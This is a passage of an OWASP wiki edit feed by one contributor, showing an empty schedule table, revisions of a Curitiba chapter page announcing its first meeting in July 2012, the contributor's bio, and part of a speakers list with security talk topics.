| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:00 – 14:40 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:40 – 15:20 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 15:20 – 16:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:00 – 16:20 &lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#E3E3E3&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:20 – 17:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 17:00 – 17:40 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 17:40 – 18:20 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 18:20 – 19:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:00 – 19:20 &lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#E3E3E3&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:20 – 20:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:00 – 20:40 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:40 – 21:20 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:20 – 21:30 &lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#E3E3E3&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132581</id>
		<title>Curitiba</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132581"/>
				<updated>2012-07-04T18:55:36Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Chapter Meetings */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Curitiba|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Curitiba|emailarchives=http://lists.owasp.org/pipermail/owasp-Curitiba}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
04/07/2012 - Primeira reunião do capítulo Curitiba no próximo dia 12 de Julho de 2012.&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
 '''Reunião 01'''&lt;br /&gt;
&lt;br /&gt;
Dando início as atividades do Capítulo Curitiba-PR convido a todos para participar da primeira reunião:&lt;br /&gt;
&lt;br /&gt;
'''Data:''' 12 de Julho de 2012&lt;br /&gt;
'''Endereço:''' Rua Marechal Hermes, 678 - CJ 32 - Curitiba, PR - Centro Cívico&lt;br /&gt;
'''Horário:''' 19h&lt;br /&gt;
&lt;br /&gt;
'''Tópicos:'''&lt;br /&gt;
&lt;br /&gt;
1 - Apresentação do que é a OWASP e seus objetivos;&lt;br /&gt;
2 - Apresentação dos principais projetos da OWASP;&lt;br /&gt;
3 - Discussão sobre como os voluntários podem contribuir.&lt;br /&gt;
&lt;br /&gt;
Por favor confirme sua participação enviando um email para: wagner.elias@owasp.org&lt;br /&gt;
&lt;br /&gt;
'''Obs.:''' a reunião é aberta a qualquer interessado e não apenas a membros da OWASP.&lt;br /&gt;
&lt;br /&gt;
==== Curitiba OWASP Chapter Leaders ====&lt;br /&gt;
The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132580</id>
		<title>Curitiba</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132580"/>
				<updated>2012-07-04T18:50:53Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Chapter Meetings */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Curitiba|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Curitiba|emailarchives=http://lists.owasp.org/pipermail/owasp-Curitiba}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
04/07/2012 - Primeira reunião do capítulo Curitiba no próximo dia 12 de Julho de 2012.&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
 '''Reunião 01'''&lt;br /&gt;
&lt;br /&gt;
Dando início as atividades do Capítulo Curitiba-PR convido a todos para participar da reunião no dia 12 de Julho de 2012 no seguinte endereço;&lt;br /&gt;
&lt;br /&gt;
Rua Marechal Hermes, 678 - CJ 32&lt;br /&gt;
Curitiba, PR - Centro Cívico&lt;br /&gt;
&lt;br /&gt;
Tópicos:&lt;br /&gt;
&lt;br /&gt;
1 - Apresentação do que é a OWASP e seus objetivos;&lt;br /&gt;
2 - Apresentação dos principais projetos da OWASP;&lt;br /&gt;
3 - Discussão de comos os voluntários podem contribuir.&lt;br /&gt;
&lt;br /&gt;
Por favor confirme sua participação enviando um email para: wagner.elias@owasp.org&lt;br /&gt;
&lt;br /&gt;
Grato&lt;br /&gt;
Wagner Elias - Líder do Capítulo Curitiba&lt;br /&gt;
&lt;br /&gt;
==== Curitiba OWASP Chapter Leaders ====&lt;br /&gt;
The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132579</id>
		<title>Curitiba</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132579"/>
				<updated>2012-07-04T18:49:00Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Chapter Meetings */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Curitiba|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Curitiba|emailarchives=http://lists.owasp.org/pipermail/owasp-Curitiba}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
04/07/2012 - Primeira reunião do capítulo Curitiba no próximo dia 12 de Julho de 2012.&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
 '''Meeting Location'''&lt;br /&gt;
&lt;br /&gt;
Dando início as atividades do Capítulo Curitiba-PR convido a todos para participar da reunião no dia 12 de Julho de 2012 no seguinte endereço;&lt;br /&gt;
&lt;br /&gt;
Rua Marechal Hermes, 678 - CJ 32&lt;br /&gt;
Curitiba, PR - Centro Cívico&lt;br /&gt;
&lt;br /&gt;
Tópicos:&lt;br /&gt;
&lt;br /&gt;
1 - Apresentação do que é a OWASP e seus objetivos;&lt;br /&gt;
2 - Apresentação dos principais projetos da OWASP;&lt;br /&gt;
3 - Discussão de comos os voluntários podem contribuir.&lt;br /&gt;
&lt;br /&gt;
Por favor confirme sua participação enviando um email para: wagner.elias@conviso.com.br&lt;br /&gt;
&lt;br /&gt;
Grato&lt;br /&gt;
Wagner Elias - Líder do Capítulo Curitiba&lt;br /&gt;
&lt;br /&gt;
==== Curitiba OWASP Chapter Leaders ====&lt;br /&gt;
The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132578</id>
		<title>Curitiba</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132578"/>
				<updated>2012-07-04T18:48:19Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Local News */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Curitiba|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Curitiba|emailarchives=http://lists.owasp.org/pipermail/owasp-Curitiba}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
04/07/2012 - Primeira reunião do capítulo Curitiba no próximo dia 12 de Julho de 2012.&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
 '''Meeting Location'''&lt;br /&gt;
&lt;br /&gt;
Everyone is welcome to  join us at our chapter meetings.&lt;br /&gt;
&lt;br /&gt;
==== Curitiba OWASP Chapter Leaders ====&lt;br /&gt;
The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132577</id>
		<title>Curitiba</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Curitiba&amp;diff=132577"/>
				<updated>2012-07-04T18:47:57Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Local News */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Curitiba|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Curitiba|emailarchives=http://lists.owasp.org/pipermail/owasp-Curitiba}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
Primeira reunião do capítulo Curitiba no próximo dia 12 de Julho de 2012.&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
 '''Meeting Location'''&lt;br /&gt;
&lt;br /&gt;
Everyone is welcome to  join us at our chapter meetings.&lt;br /&gt;
&lt;br /&gt;
==== Curitiba OWASP Chapter Leaders ====&lt;br /&gt;
The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Wagner.elias&amp;diff=122833</id>
		<title>User:Wagner.elias</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Wagner.elias&amp;diff=122833"/>
				<updated>2012-01-17T18:04:07Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* Wagner Elias's [mailto:wagner.elias@owasp.org mail contact] and [[:Special:Contributions/Wagner.elias|wiki contributions]].&lt;br /&gt;
&lt;br /&gt;
Wagner Elias works with Information Security since 2004, worked as a consultant, team leader and manager of consulting.&lt;br /&gt;
Has extensive experience in conducting projects with in Application Security and deployed solutions in companies of several segments.&lt;br /&gt;
&lt;br /&gt;
It has the certifications CBCP, SANS GIAC GHTQ, ITIL and CobiT Foundations, beyond certification of products SIEM and WAF. He is the founder of the Brazilian chapter of OWASP and currently leads the Curitiba-Brazil chapter. He served as director of Education and Content management in 2006-2008 and Event management 2008-2010 of the Brazilian chapter of ISSA. He is co-founder and CTO of Conviso Application Security, where serves as CTO, responsible for managing research and development project consulting.&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Speakers_Project&amp;diff=122832</id>
		<title>Category:OWASP Speakers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Speakers_Project&amp;diff=122832"/>
				<updated>2012-01-17T18:02:07Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* available speakers */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This program lead by [[:user:Knoblochmartin|Martin Knobloch]] helps local chapters or application security conferences to find OWASP related speakers to have OWASP presenters on site.&lt;br /&gt;
&lt;br /&gt;
This program allows two parties to find each other:&lt;br /&gt;
&lt;br /&gt;
* Local chapters or application security events that want to attract an OWASP speaker&lt;br /&gt;
* OWASP speakers to entertain OWASP presentations and that want to see the world&lt;br /&gt;
&lt;br /&gt;
For sponsorship, see the [[:Category:OWASP_on_the_Move_Project|OWASP on the Move Project]] page&lt;br /&gt;
&lt;br /&gt;
== available presentations ==&lt;br /&gt;
&lt;br /&gt;
== available speakers  ==&lt;br /&gt;
&lt;br /&gt;
If you want to (re)do an OWASP related presentation, propose them here with your availability boundaries (timing/geographical) &lt;br /&gt;
&lt;br /&gt;
*Add your name, contact and bio information to become available as OWASP Speaker!&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;prettytable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Name &lt;br /&gt;
! Introduction &lt;br /&gt;
! Available Area &lt;br /&gt;
! Bios&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:Robert(at)ZakonGroup.com Robert H'obbes' Zakon] &lt;br /&gt;
| Presenter on Web Application Security, OWASP Top 10, PHP Security, and assorted other topics.  Training sessions taught at events such as [http://www.zakongroup.com/technology/services-training.shtml OWASP, ACSAC, and CCS].  Based in New Hampshire, and available for travel worldwide.  Fluent in English, and able to converse in Portuguese.  A developer and consultant for the past decade, formerly a Principal Engineer with MITRE's InfoSec Group. &lt;br /&gt;
| Global (USA/NH-based) &lt;br /&gt;
| [http://www.zakon.org/robert/vitae.html BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:jmcgovern@virtusa.com James McGovern] &lt;br /&gt;
| Presenter on Enterprise Architecture and Web Application Security, SOA Web Services Security and Federated Identity.   &lt;br /&gt;
| Global (USA/CT-based) &lt;br /&gt;
| [http://www.linkedin.com/in/jamesmcgovern BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:chuck(at)McCulloughAssociates.com Chuck McCullough] &lt;br /&gt;
| Chuck provides training sessions to developers on the Top 10. Chuck welcomes speaking opportunities to any group. Chuck is available in the Texas area and at various other locations in the USA. &lt;br /&gt;
| USA/Texas &lt;br /&gt;
| [http://www.linkedin.com/in/chuckmccullough BIO]&lt;br /&gt;
|-&lt;br /&gt;
| Marc Curphey &lt;br /&gt;
| Marc will happily speak about the WebAppSec industry, SDLC etc. around Europe. You can see him in action at [http://video.hitb.org/2006.html HITB with John Viega] (big download) &lt;br /&gt;
| Europe &lt;br /&gt;
| [http://www.linkedin.com/in/curphey BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:tomb(at)owasp.org Tom Brennan] &lt;br /&gt;
| based in NYC Metro Tom is a long time volunteer and OWASP contributor and [http://www.owasp.org/index.php/About_OWASP International Board Member].  He is available for global speaking venues to educate audiences about the OWASP Foundation core mission, how it works and various projects. In addition he also provides regular talks on honeypot research and case-studies about tactical experiences when conducting [http://en.wikipedia.org/wiki/Red_Team Red Team]/Tiger Team assessments involving the application, network, wireless and physical security - [https://www.owasp.org/index.php/User:Brennan BIO]&lt;br /&gt;
| Global &lt;br /&gt;
| [http://www.linkedin.com/in/tombrennan BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:thesp0nge@owasp.org Paolo Perego] &lt;br /&gt;
| Paolo is available to talk about [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project Orizon project], safe coding and code review issues around Europe in the near October-December. &lt;br /&gt;
| Europe &lt;br /&gt;
| [http://www.linkedin.com/in/thesp0nge BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:marc.m.morana@gmail.org Marco Morana] &lt;br /&gt;
| Marco is available to talk about [http://iac.dtic.mil/iatac/download/security.pdf Software Security Frameworks]and Secure Code Reviews [https://www.cmpevents.com/CSI33/a.asp?option=G&amp;amp;V=3&amp;amp;id=443342 see 07 CSI conference as reference] in USA around November-December and in Europe around January-February &lt;br /&gt;
| Europe &lt;br /&gt;
| [http://www.linkedin.com/pub/2/a7a/59b BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:sebastien.gioria@owasp.fr Sébastien Gioria] &lt;br /&gt;
| Sebastien is available to talk about WebAppSec, educational purpose on AppSec in French or at least in english around France/Europe/Canada from middle of March 08. You can find some Talk on the [http://www.owasp.fr Owasp France Chapter] &lt;br /&gt;
| France/Europe/Canada &lt;br /&gt;
| [http://www.linkedin.com/in/gioria BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:mkraushar@gmail.com Mordecai Kraushar] &lt;br /&gt;
| Mordecai is available to talk about different topics within the Web application security space. One discussion involves the OWASP project [http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project Vicnum], a flexible vulnerable web application that can be used in 'capture the flag' exercises. &lt;br /&gt;
| Northeastern United States &lt;br /&gt;
| [http://www.linkedin.com/in/mkraushar BIO]&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:michael.coates@owasp.org Michael Coates] &lt;br /&gt;
| Michael is available to talk on a variety of web application security topics. Talks are interactive and include live demos and code examples. Michael has spoken at multiple OWASP conferences and University security courses on topics such as Introduction to Application Security, Automated Defense Systems in Applications, Real Time Detection and Prevention of Application Worms, and security risks in SSL/TLS.  &lt;br /&gt;
